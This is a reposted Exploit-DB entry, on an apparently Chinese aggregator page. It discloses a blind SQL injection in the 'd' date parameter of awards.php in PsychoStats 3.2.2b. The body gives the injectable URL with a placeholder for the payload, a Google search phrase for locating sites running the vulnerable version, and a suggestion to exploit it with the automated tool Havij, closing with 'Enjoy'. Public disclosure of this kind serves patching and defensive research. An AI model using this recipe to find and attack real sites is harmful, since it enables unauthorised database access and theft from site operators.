PsychoStats 3.2.2b – ‘awards.php’ Blind SQL Injection

• Exploit Database
• 9 阅读

• 作者： Mohamed from ALG
  日期： 2013-03-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24893/

• Exploit Title :PsychoStats awards.php blind SQL Injection
  ==============
  Date: 27/03/2013 00:50
  =====
  Author: Mohamed from ALG
  ======
  Vendor or Software Link:http://psychostats.us/
  =======================
  Version: 3.2.2b
  ========
  Category: webapps
  =========
  Google Keywords: "Powered by PsychoStats 3.2.2b"
  ===============
  contact: senderberd[at]gmail.com
  ========
  
  exploit:
  ========
  
  http://server/awards.php?d=YYYY-MM-DD{Inject hier your blind SQL injection}
  
  
  Use Havij to easy exploit 
  Enjoy 
  
  
  S.Th To a El Koyot
  
  end